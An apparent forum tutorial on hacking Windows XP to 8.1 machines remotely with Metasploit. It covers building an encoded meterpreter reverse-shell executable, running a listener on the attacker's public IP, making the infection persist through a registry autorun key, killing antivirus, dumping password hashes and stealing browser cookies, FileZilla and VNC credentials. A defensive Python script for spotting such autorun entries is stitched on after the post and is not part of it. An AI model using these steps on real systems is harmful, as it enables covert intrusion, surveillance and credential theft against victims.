
Hack WIN XP,7,8.1 out of your LAN. [Kali 2.0]


This is a tutorial about how to hack Windows from version XP to 8.1 (10??) from all around the world.


This tutorial is strictly for educational purposes only; I am not responsible for any of the actions you may take upon others.

Follow my steps!

Step 1: Install Kali Linux (Backtrack's exploits, payloads etc. are outdated).

Step 2: Open a Terminal (or Terminator).

Step 3: Type these commands:

apt-get update


use windows/meterpreter/reverse_tcp

show options

Now this will show up :

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique

LHOST yes The listen address

LPORT 4444 yes The listen port

set LHOST YourPublicIP #hack out of your LAN


set LHOST YourLanIP #hack in your LAN

ex for out-of-lan : set LHOST


ex for in-lan : set LHOST

show encoders #find yourself a encoder

generate -t exe -f virusexe -e thenameofencoder

use exploit/multi/handler

set LHOST yourlanip #ONLY YOUR LAN IP

set ExitOnSession false #so you can get many others connections

set PAYLOAD windows/meterpreter/reverse_tcp

Now there's a thing that you're gonna need to do: port forwarding.

Port forward port 4444 or whatever port you chose.

exploit -z -j

After your victim has run the virus you should get this message in your terminal:

[*] Sending stage (885806 bytes) to (or whatever the victim's ip is)

[*] Meterpreter session 2 opened ( -> at DATE

run killav


migrate id #migrate to a process

run persistence -X -i 30 -p 4444 -r yourpublicipaddress/yourlanipaddress


run persistence -U -i 30 -p 4444 -r yourpublicipaddress/yourlanipaddress

#if you don't know what these -u,-x etc mean type in run persistence -h

#remember if you don't understand something always type in name -h then ask questions.

Something like this will show up :

[*] Running Persistence ....

[*] Resource file for cleanup created at ....

[*] Creating Payload= ....

[*] Persistent agent script is 123456 bytes long....

[+] Persistent Script written to ....

[*] Executing script ....

[+] Agent executed with PID 4504 ....

[*] Installing into autorun as HKCU\Software\Microsoft\Windows\Current Version\Run\qdWeheEDUKp #or whatever the name is at the end

[+] Installed into autorun as HKCU\Software\Microsoft\Windows\Current Version\Run\qdWeheEDUKp #or whatever the name is at the end

reg queryval -k HKCL\\Software\\Microsoft\\Windows\\Current Version\\Run -v qdWeheEDUKp #or whatever the name is at the end


reg queryval -k HKCU\\Software\\Microsoft\\Windows\\Current Version\\Run -v qdWeheEDUKp #or whatever the name is at the end

Useful commands (not necessary):

help #find here awesome commands

run duplicate #you can run this to duplicate your meterpreter session; if you execute risky commands your session might be killed by the AV

run enum_chrome #download cookies,history,web data etc of your victim's Google Chrome

run enum_firefox #same but for firefox

run enum_putty #see putty connections

run get_application_list #get all names of the apps installed on victim's PC

run getcountermeasure #checks for firewall,antivirus and stuff

run get_env #extracts a list of all system and user environments variables

run getfilezillacreds #you know what this does cmon

run getgui #enables windows RDP

run get_local_subnets #gets a list of local subnets

run gettelnet #checks if the telnet is installed

run getvncpasswors #gets vnc passwords duuuh?

run hashdump #gets password hashes from SAM

run multicommand #you can run multiple commands on host

run multi_console_command #run multiple console commands on a meterpreter session

run multi_meter_inject #you know what this does

run packetrecorder #captures packets into PCAP files

run prefetchtool #extracts info for prefetch folder

run schelevator # exploit for windows privilege escalation and task scheduler 20 xml 0day by STUXNET

run scraper #obtain system info from victim

run screenspy #spies screen duuuh ???

run virtualbox_sysenter_dos #dos virtual box

run birusscan_bypass #kills McAfee VirusScan v870i+ processes

This is Original Content

If it's not Original Content I assume my fault. I haven't seen any thread about this before.

Use this for legal purposes.

If this is used for illegal purposes it's not my fault it's only yours.

Edited by uktea3
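From the defender's side, the autorun value shown in the persistence output above is the artifact to hunt for. The following is an added example, not part of the original post: it triages `reg query` output for the per-user Run key. Because the value name is random, it keys on what the value launches rather than on the name. The sample output, the function names and the assumption that the dropped file is a script in a temp directory are constructed for illustration (the post elides the actual path).

```python
import re

# Constructed sample of `reg query` output for the per-user Run key (not from the post).
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    qdWeheEDUKp    REG_SZ    C:\Users\alice\AppData\Local\Temp\HzKqPwTn.vbs
    Updater    REG_EXPAND_SZ    %ProgramFiles%\Vendor\updater.exe
"""

# reg.exe prints: indent, value name, 4 spaces, type, 4 spaces, data.
LINE = re.compile(r"^\s+(?P<name>\S.*?)\s{4}(?P<kind>REG_\w+)\s{4}(?P<data>.*)$")
# Assumed indicators: autorun target is a script file or lives in a temp/public directory.
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)\b", re.I)
USER_WRITABLE = re.compile(r"\\(temp|tmp)\\|%temp%|\\users\\public\\", re.I)


def parse_run_key(text):
    """Return (name, type, data) tuples; the key header line is skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            entries.append((m["name"], m["kind"], m["data"].strip()))
    return entries


def triage(entries, baseline=()):
    """Skip (name, data) pairs present in a known-good baseline; grade the rest."""
    known = set(baseline)
    findings = []
    for name, _kind, data in entries:
        if (name, data) in known:
            continue
        reasons = []
        if SCRIPT_EXT.search(data):
            reasons.append("script target")
        if USER_WRITABLE.search(data):
            reasons.append("user-writable path")
        findings.append((name, "high" if reasons else "review", reasons))
    return findings


if __name__ == "__main__":
    entries = parse_run_key(SAMPLE)
    baseline = [(entries[0][0], entries[0][2])]  # OneDrive recorded as known-good
    for name, severity, reasons in triage(entries, baseline):
        print(f"{severity:6} {name}: {', '.join(reasons) or 'new since baseline'}")
```

Matching the full (name, data) pair against the baseline means a known value name that has been repointed at a different target is still reported.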
